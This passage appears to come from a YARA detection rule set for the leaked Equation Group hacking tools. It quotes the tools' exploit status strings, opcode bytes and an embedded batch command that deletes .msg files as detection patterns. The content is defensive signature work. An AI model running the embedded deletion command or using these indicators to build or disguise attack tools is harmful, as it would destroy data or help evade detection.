      hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
   strings:
      $x1 = "kernel has 4G/4G split, not exploitable" fullword ascii
      $x2 = "[+] kernel stack size is %d" fullword ascii
   condition:
      ( uint16(0) == 0x457f and filesize < 1000KB and 1 of them )
}

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2017-04-15
   Identifier: Equation Group Toolset - Windows Folder
   Reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
*/

/* Rule Set ----------------------------------------------------------------- */

// Three related launcher/proxy tools (three hashes); any one message matches.
rule EquationGroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
      hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
      hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
   strings:
      $x1 = "[-] Failed to Prepare Payload!"
fullword ascii
      $x2 = "ShellcodeStartOffset" fullword ascii
      $x3 = "[*] Waiting for AuthCode from exploit" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them )
}

// "touch" (probe) tool for an IIS/WebDAV target. $s4 is WebDAV If-header
// syntax (a lock-token assertion) and is the most specific of the three;
// any one string is enough to match.
rule EquationGroup_Toolset_Apr17_Explodingcantouch_1_2_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
   strings:
      $x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii
      $s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii
      $s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 150KB and 1 of them )
}

// Single short format string carries this whole rule; "[+] Target is %s" is
// generic enough that other tooling may contain it, so treat hits on this
// rule alone as low confidence and corroborate with the hash or other rules.
rule EquationGroup_Toolset_Apr17_Architouch_1_0_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
   strings:
      $s1 = "[+] Target is %s" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 300KB and all of them )
}

// Erraticgopher exploit client; status messages name the Dimsvc RPC interface.
rule EquationGroup_Toolset_Apr17_Erraticgopher_1_0_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
   strings:
      $x1 = "[-] Error appending shellcode buffer" fullword ascii
      $x2 = "[-] Shellcode is too big" fullword ascii
      $x3 = "[+] Exploit Payload Sent!"
fullword ascii
      $x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 150KB and 1 of them )
}

// Esteemaudit client. $x1 ("Connected to target %s:%d") is a generic message;
// $x2 (a function name in an error prefix) is the specific one.
rule EquationGroup_Toolset_Apr17_Esteemaudit_2_1_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
   strings:
      $x1 = "[+] Connected to target %s:%d" fullword ascii
      $x2 = "[-] build_exploit_run_x64():" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them )
}

// Darkpulsar; both DLL-architecture error messages are required.
rule EquationGroup_Toolset_Apr17_Darkpulsar_1_1_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
   strings:
      $x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii
      $x2 = "[%s] - Error building DLL loading shellcode" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 100KB and all of them )
}

// Educatedscholar exploit client; "[+] Exploiting Target" alone is a weak
// string (it also appears in other tools of this set), so $x1 is the better
// indicator when triaging a hit.
rule EquationGroup_Toolset_Apr17_Educatedscholar_1_0_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
   strings:
      $x1 = "[+] Shellcode Callback %s:%d" fullword ascii
      $x2 = "[+] Exploiting Target" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 150KB and 1 of them )
}

// Doublepulsar client (the operator-side tool, not the kernel implant itself).
rule EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1
= "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
   strings:
      $x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii
      $x2 = "[.] Sending shellcode to inject DLL" fullword ascii
      $x3 = "[-] Error setting ShellcodeFile name" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them )
}

// Erraticgopher "touch" (vulnerability probe). The misspelling "broswer" in
// $x1 is part of the signature; do not correct it.
rule EquationGroup_Toolset_Apr17_Erraticgophertouch_1_0_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
   strings:
      $x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii
      $x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii
      $x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 30KB and 1 of them )
}

// Smbtouch probe; one distinctive summary string carries the rule.
rule EquationGroup_Toolset_Apr17_Smbtouch_1_1_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
   strings:
      $x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 400KB and all of them )
}

// Educatedscholar "touch" probe; tiny binary (< 30KB bound).
rule EquationGroup_Toolset_Apr17_Educatedscholartouch_1_0_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
   strings:
      $x1 = "[!] A vulnerable target will not respond."
fullword ascii
      // "Vulernable" is the sample's own misspelling; it is what makes $x2 specific.
      $x2 = "[-] Target NOT Vulernable" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 30KB and 1 of them )
}

// Esteemaudit "touch" probe; either status message matches.
rule EquationGroup_Toolset_Apr17_Esteemaudittouch_2_1_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
   strings:
      $x1 = "[-] Touching the target failed!" fullword ascii
      $x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them )
}

// Rpctouch OS/service-pack fingerprinting probe.
rule EquationGroup_Toolset_Apr17_Rpctouch_2_1_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
   strings:
      $x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii
      $x2 = "[*] SMB String: %s (%s)" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them )
}

// Mofconfig helper; single string, small-file bound.
rule EquationGroup_Toolset_Apr17_Mofconfig_1_0_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
   strings:
      $x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 50KB and all of them )
}

// Shared rule for the Easypi and Explodingcan clients (two hashes).
rule EquationGroup_Toolset_Apr17_Easypi_Explodingcan {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
      hash2 =
"97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
   strings:
      $x1 = "[-] %s - Target might not be in a usable state." fullword ascii
      // "[*] Exploiting Target" is shared wording across this tool set; weak on its own.
      $x2 = "[*] Exploiting Target" fullword ascii
      $x3 = "[-] Encoding Exploit Payload failed!" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them )
}

// Eclipsedwing "touch" probe; the two verdict strings are generic wording, so
// a hit is best confirmed with the hash or a sibling rule.
rule EquationGroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
   strings:
      $x1 = "[-] The target is NOT vulnerable" fullword ascii
      $x2 = "[+] The target IS VULNERABLE" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 50KB and 1 of them )
}

// IIS "touch" probe. "redirectect" in $x1 is the sample's misspelling; keep it.
rule EquationGroup_Toolset_Apr17_Iistouch_1_2_2 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
   strings:
      $x1 = "[-] Are you being redirectect? Need to retarget?"
fullword ascii
      $x2 = "[+] IIS Target OS: %s" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 60KB and 1 of them )
}

// Named-pipe enumeration probe (two hashes). $s12 is a 40-hex-character
// literal embedded in the sample, not a hash of the file. $op1 pushes an
// absolute address (68 10 10 40 00 = push 0x401010), so it is tied to this
// build's image base; any two of the five patterns match.
rule EquationGroup_Toolset_Apr17_Namedpipetouch_2_0_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
      hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
   strings:
      $s1 = "[*] Summary: %d pipes found" fullword ascii
      $s3 = "[+] Testing %d pipes" fullword ascii
      $s6 = "[-] Error on SMB startup, aborting" fullword ascii
      $s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii
      $op1 = { 68 10 10 40 00 56 e8 e1 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 40KB and 2 of them )
}

// Easybee. $x1 is an embedded cmd.exe batch fragment (findstr over *.msg,
// then del); the doubled %% is batch-file escaping and the \" are YARA
// escapes for literal quotes.
rule EquationGroup_Toolset_Apr17_Easybee_1_0_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
   strings:
      $x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii
      $x2 = "Logging out of WebAdmin (as target account)" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them )
}

// Regread. With "1 of them", the generic $s1 alone fires the rule; $s2 is the
// embedded 40-hex literal that gives a confident hit.
rule EquationGroup_Toolset_Apr17_Regread_1_1_1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
   strings:
      $s1 = "[+] Connected to the Registry Service" fullword ascii
      $s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them )
}

// Englishmansdentist client; either credential-check message matches.
rule
EquationGroup_Toolset_Apr17_Englishmansdentist_1_2_0 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
   strings:
      $x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii
      $x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them )
}

// Shared rule for three SMB tools. $s1/$s3 are the tools' own "NtError*"
// spellings rather than the standard STATUS_* NTSTATUS names, which is what
// makes them specific; any two of the four patterns match.
rule EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
      hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
      hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
   strings:
      $s1 = "NtErrorMoreProcessingRequired" fullword ascii
      $s2 = "Command Format Error: Error=%x" fullword ascii
      $s3 = "NtErrorPasswordRestriction" fullword ascii
      $op0 = { 8a 85 58 ff ff ff 88 43 4d }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 600KB and 2 of them )
}

// Second Eternalromance rule (three hashes; two overlap with the other
// Eternalromance rule, the third is the Eternalsynergy sample above).
rule EquationGroup_Toolset_Apr17_Eternalromance_2 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
      hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
      hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
   strings:
      $x1 = "[+] Backdoor shellcode written" fullword ascii
      $x2 = "[*] Attempting exploit method %d" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize <
600KB and 1 of them )
}

// Emphasismine (Domino/IMAP-oriented, per its own messages). The doubled
// underscore in the rule name is inconsistent with its siblings but renaming
// would change the identifier other tooling may reference, so it is kept.
// $x4 is matched as a literal string (it is quoted, not a /regex/) even though
// it reads like a regular expression; $x3 alone is a weak indicator.
rule EquationGroup_Toolset_Apr17__Emphasismine {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
      hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
   strings:
      $x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii
      $x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii
      $x3 = "Generating shellcode" fullword ascii
      $x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii
      $x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them )
}

// Eternalromance client (two hashes). Note the condition: the "or 2 of them"
// branch is outside the parenthesised guard, so two string hits match in any
// file regardless of the MZ header and size bound. That widens coverage to
// memory dumps and non-PE carriers but also removes the cheap pre-filter.
rule EquationGroup_Toolset_Apr17_Eternalromance {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
      hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
   strings:
      $x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii
      $x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii
      $x3 = "[-] Error: Backdoor not present on target" fullword ascii
      $x4 = "*********** TARGET ARCHITECTURE IS X64 ************" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them
}

// Generic rule over 14 samples. $op1 is the same opcode fragment used by
// EquationGroup_Toolset_Apr17_Gen3, so the two rules are expected to co-fire.
// One of the $x strings, or any two patterns, is enough.
rule EquationGroup_Toolset_Apr17_Gen4 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
      hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
      hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
      hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
      hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
      hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
      hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
      hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
      hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
      hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
      hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
      hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
      hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
      hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
   strings:
      $x1 = "[+] \"TargetPort\" %hu" fullword ascii
      $x2 = "---<<< Complete >>>---" fullword ascii
      $x3 = "[+] \"NetworkTimeout\" %hu" fullword ascii
      $op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 150KB and ( 1 of ($x*) or 2 of them ) )
}

// Generic rule over two CURL-based samples; any one message matches.
rule EquationGroup_Toolset_Apr17_Gen1 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference =
"https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
      hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
   strings:
      $x1 = "Restart with the new protocol, address, and port as target." fullword ascii
      $x2 = "TargetPort : %s (%u)" fullword ascii
      $x3 = "Error: strchr() could not find '@' in account name." fullword ascii
      $x4 = "TargetAcctPwd : %s" fullword ascii
      // Generic wording any libcurl-based program could carry; weak on its own.
      $x5 = "Creating CURL connection handle..." fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them )
}

// Generic rule over four SMB-payload samples. $s4 looks like a placeholder
// UUID. The trailing "or 3 of them" sits outside the parenthesised guard, so
// three pattern hits match without the MZ/size pre-filter.
rule EquationGroup_Toolset_Apr17_Gen2 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
      hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
      hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
      hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba"
   strings:
      $s1 = "[+] Setting password : (NULL)" fullword ascii
      $s2 = "[-] TbBuffCpy() failed!"
fullword ascii
      $s3 = "[+] SMB negotiation" fullword ascii
      $s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii
      $s5 = "Value must end with 0000 (2 NULLs)" fullword ascii
      $s6 = "[*] Configuring Payload" fullword ascii
      $s7 = "[*] Connecting to listener" fullword ascii
      $op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 }
      $op2 = { eb 59 8b 4c 24 10 68 1c 46 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of ($s*) and 1 of ($op*) ) or 3 of them
}

// Generic rule over 12 samples (the same set as hash3..hash14 of Gen4, and
// the same $op1 fragment). Two of the three patterns are required, so the
// opcode plus one credential message, or both messages, will match.
rule EquationGroup_Toolset_Apr17_Gen3 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      super_rule = 1
      hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
      hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
      hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
      hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
      hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
      hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
      hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
      hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
      hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
      hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
      hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
      hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
   strings:
      $s1 = "Logon failed. Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii
      $s2 = "[-] Could not set \"CredentialType\"" fullword ascii
      $op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 150KB and 2 of them )
}

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2017-04-15
   Identifier: Equation Group Tools - Resource Folder
   Reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
*/

/* Rule Set ----------------------------------------------------------------- */

// "yak" keystroke/scancode archive dumper (per its own usage text). Two of
// the four strings are required; $x2/$x3 are UTF-16 ("wide").
rule EquationGroup_Toolset_Apr17_yak {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
   strings:
      $x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii
      $x2 = "-------- driver start token -------" fullword wide
      $x3 = "-------- keystart token -------" fullword wide
      $x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 800KB and 2 of them )
}

// AD user-lookup implant. $s1 is an MSVC RTTI type-descriptor name (mangled
// class name "FeFinallyFailure"); $s2 is the start of an LDAP filter for user
// objects, stored as UTF-16. Both are required.
rule EquationGroup_Toolset_Apr17_AdUser_Implant {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
   strings:
      $s1 = ".?AVFeFinallyFailure@@" fullword ascii
      $s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
   condition:
      ( uint16(0) == 0x5a4d and filesize < 40KB and all of them )
}

// RemoteExecute implant; matched on a block of adjacent UTF-16 literals.
rule EquationGroup_Toolset_Apr17_RemoteExecute_Implant {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 =
"770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
   strings:
      // Despite the $op name this is data, not code: a run of adjacent UTF-16LE
      // literals that decode to "Schedule", "ServicesActive", "\pipe\SecondaryLogon",
      // "\", "WinSta0\Default", "ncacn_np" and "\pipe\SECLOGON", with a few raw
      // bytes between them. It therefore pins the exact layout of this build.
      $op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00 00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00 00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68 5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00 63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00 6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00 6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00 00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E }
   condition:
